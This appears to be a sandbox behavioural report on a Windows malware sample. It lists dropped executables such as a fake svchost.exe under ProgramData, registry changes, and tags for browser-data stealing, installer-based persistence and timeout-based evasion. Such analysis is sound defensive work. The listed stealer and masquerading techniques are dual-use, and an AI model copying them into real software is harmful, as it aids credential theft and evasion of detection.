File opened for modification C:\Windows\Installer\MSID064.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_el.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_en-GB.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_et.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_hi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\~DF0B595319A2601E38.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psuser.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_da.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_pl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_te.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_id.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\GUTFD1F.tmp C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psmachine_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_fi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_hu.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_iw.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_pt-BR.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_sl.dll C:\ProgramData\setup\setup.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Smart\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000745509500620e41d0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000745509500000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090074550950000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d74550950000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007455095000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846529451297910" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods\ = "6" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VersionIndependentProgID\ = "GoogleUpdate.Update3WebMachine" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\Application\AppUserModelId = "Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods\ = "4" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass.1\CLSID\ = "{9B2340A0-4068-43D6-B404-32E27217859D}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\psmachine_64.dll" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9465B4B4-5216-4042-9A2C-754D3BCDC410}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ = "IProcessLauncher2" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D656199B-93F2-4D64-AA2F-96BD3F18D40E} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ProgID\ = "GoogleUpdate.ProcessLauncher.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32 C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods\ = "4" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\APPID\{9465B4B4-5216-4042-9A2C-754D3BCDC410} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ = "IPolicyStatus3" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\ = "Google Update Core Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\Application\ApplicationName = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
